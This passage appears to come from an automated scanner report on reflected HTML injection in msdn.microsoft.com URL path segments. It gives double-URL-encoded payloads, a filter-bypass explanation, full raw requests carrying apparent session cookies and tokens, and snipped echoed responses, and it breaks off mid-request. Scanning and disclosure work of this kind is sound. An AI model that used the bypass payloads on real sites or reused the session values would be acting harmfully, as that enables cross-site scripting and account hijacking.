Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbad9%2522%253e%253ca%253e8df1c91ad96 was submitted in the REST URL parameter 1. This input was echoed as dbad9"><a>8df1c91ad96 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usdbad9%2522%253e%253ca%253e8df1c91ad96/library/ms689718(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdbad9"><a>8df1c91ad96/library/ms689718(VS.85" />
...[SNIP]...

2.112. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc98%2522%253e%253ca%253ea7defceea7f was submitted in the REST URL parameter 2. This input was echoed as 5dc98"><a>a7defceea7f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library5dc98%2522%253e%253ca%253ea7defceea7f/ms689718(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9212
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5dc98"><a>a7defceea7f/ms689718(VS.85" />
...[SNIP]...

2.113. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597f0%2522%253e%253ca%253e4ee946ae8f7 was submitted in the REST URL parameter 3. This input was echoed as 597f0"><a>4ee946ae8f7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(VS.85597f0%2522%253e%253ca%253e4ee946ae8f7 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85597f0"><a>4ee946ae8f7" />
...[SNIP]...

2.114. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87014%2522%253e%253ca%253e61c23bd9200 was submitted in the REST URL parameter 1. This input was echoed as 87014"><a>61c23bd9200 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us87014%2522%253e%253ca%253e61c23bd9200/library/ms689718(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:40 GMT
Content-Length: 9188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87014"><a>61c23bd9200/library/ms689718(VS.85)" />
...[SNIP]...

2.115. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb0d%2522%253e%253ca%253e61e6c453a14 was submitted in the REST URL parameter 2. This input was echoed as cbb0d"><a>61e6c453a14 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarycbb0d%2522%253e%253ca%253e61e6c453a14/ms689718(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:11 GMT
Content-Length: 9189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarycbb0d"><a>61e6c453a14/ms689718(VS.85)" />
...[SNIP]...

2.116. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598c0%2522%253e%253ca%253e64b1072645f was submitted in the REST URL parameter 3. This input was echoed as 598c0"><a>64b1072645f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(VS.85).aspx598c0%2522%253e%253ca%253e64b1072645f HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
